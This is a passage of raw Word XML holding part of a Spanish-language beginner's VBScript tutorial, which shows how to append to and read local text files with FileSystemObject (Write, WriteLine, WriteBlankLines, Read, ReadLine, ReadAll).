        </w:rPr>
        <w:t>Chr(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">13)) y el uso de la concatenación (&amp;), al igual que el uso de variables, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>para escribir en el archiv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905"/>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905"/>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arc = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>fso.GetFile</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>("c:\ArchivoPrueba.txt") Set esc = arc.OpenAsTextStream(8) variable = InputBox("Escribe","Escribe","Escribe") esc.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>write</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>("Este es el contenido del InputBox: "&amp;variable) esc.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>clos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es un buen ejemplo de lo que se podría hacer en breves líneas. Ten en cuenta que estamos anexando al final de lo que ya hay escrito en el archivo, y que si este no existe provocará un error, así que ya sabes: usa </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>FileExists</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</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Hay más funciones de escritura. Estas son: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>WriteLin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WriteBlankLines</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. La función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Write </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">escribe en una línea el texto que quieres, pero si usas dos, no cambia de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>línea</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> sino que sigue en la misma:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5348"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708"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="53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arc = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>fso.GetFile</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>("c:\ArchivoPrueba.txt")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="104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et esc = arc.OpenAsTextStream(8) esc.Write "Texto que se escribe o" esc.Write " se anexa en el archivo." esc.Clos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w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Texto que se escribe o se anexa en el archivo. </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">En cambio, la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">WriteLine, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">escribe el texto que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>introduces en una línea, pero si pones dos o mas, cada nueva que pongas se escribirá en una línea diferente.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5348"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708"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="53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arc = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>fso.GetFile</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>("c:\ArchivoPrueba.txt")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="49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et esc = arc.OpenAsTextStream(8) esc.WriteLine "Texto que se escribe o" esc.WriteLine " se anexa en el archivo." esc.Close</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="266"/>
        <w:ind w:left="71" w:right="6012"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Texto que se escribe o se anexa en el archivo.</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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>último</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">WriteBlankLines </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>escribe tantas líneas vacías como le indiques, donde 2, es el número de líneas que quieres que baje:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5348"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984"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="53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arc = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>fso.GetFile</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>("c:\ArchivoPrueba.txt")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="445"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esc = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>arc.OpenAsTextStream</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>(8) esc.WriteLine "Texto que se escribe o" esc.WriteBlankLines(2)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="49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sc.WriteLine " se anexa en el archivo." esc.Close</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="542"/>
        <w:ind w:left="93" w:right="523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escribirá en el archivo: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Texto que se escribe o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="266"/>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se anexa en el archiv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último lugar, en la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">quinta linea </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">se escribe </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>esc.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>close</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para cerrar el archivo. No se debe omitir o lo dejarás abierto y no se podrá tocar (esto es una forma de proteger un archivo de que algunos programas lo borren).</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Si el archivo que se intenta abrir para anexar no existe se produce el siguiente error:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1588"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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3475990" cy="1590040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6353" name="Picture 6353"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="6353" name="Picture 6353"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3475990" cy="159004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eso, es mejor que te asegures antes con la sentencia If y </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>FileExists</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> o creándolo con la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">CreateTextFile </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>escribiendo False en vez de True, por ejemplo.</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ueno, mi recomendación es que practiques mucho, pues la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>práctica hace maestros</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Hemos visto todo lo que se puede hacer con archivos, a estas alturas estoy seguro que ya sabes que es lo único que falta: leer un archivo. La siguiente función necesita el objeto </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Scripting.FileSystemObject</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y permite leer un archivo o alguna parte de el. El tipo de archivos que se pueden leer son muy variados, algunos de ellos son: Archivos de Texto, Scripts de VBScript y JScript, Paginas Htm. En definitiva: texto plano. (No se pueden leer documentos del Word) Se coloca de la siguiente forma:</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156"/>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94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fso.OpenTextFile("c:\Doc2.txt", 1)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Read(5)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en la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>primera línea</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> colocamos el objeto. En la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>segunda línea</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizando el objeto usamos la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>OpenTextFile (</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">que lleva delante unido por un punto (.) la variable (fso) que guarda el objeto). Dentro de la función colocamos primero la ruta, que en este caso es el disco duro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seguido de \ y el nombre del archivo, un punto y su extensión. El numero </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>1 significa que es un archivo para leer</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, y no se puede cambiar, pues el 2 es para sobrescribir y el 8 anexar, que son para escribir, no leer. Todo esto esta unido a una variable mediante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esto guarda la estructura del archivo para que pueda ser leído posteriormente usando esta variable. En la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>tercera línea</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> usamos la variabl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seguido de un punto y la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>read</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, que dentro de ella lleva el número de caracteres que se quieren leer. Esto va unido a la variable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que guardará los datos leídos.</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Hay más funciones de lectura aparte de </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Read</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Estas son: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ReadLine, ReadAll</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kip</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SkipLine</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. La función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">ReadLine </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">lee una línea del </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>archivo y la guarda en una variable. Se considera una línea hasta llegar a un salto de línea (vbCrlf) vista con el bloc de notas.</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156"/>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OpenTextFile</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>("c:\Doc2.txt", 1)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="2033"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ReadLin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unción </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">ReadAll, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>lee todo el archivo y lo guarda en una variable. Esta función tarda un poco porque suele realizarse.</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156"/>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942"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fso.OpenTextFile("c:\Doc2.txt", 1)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ReadAll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unción </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
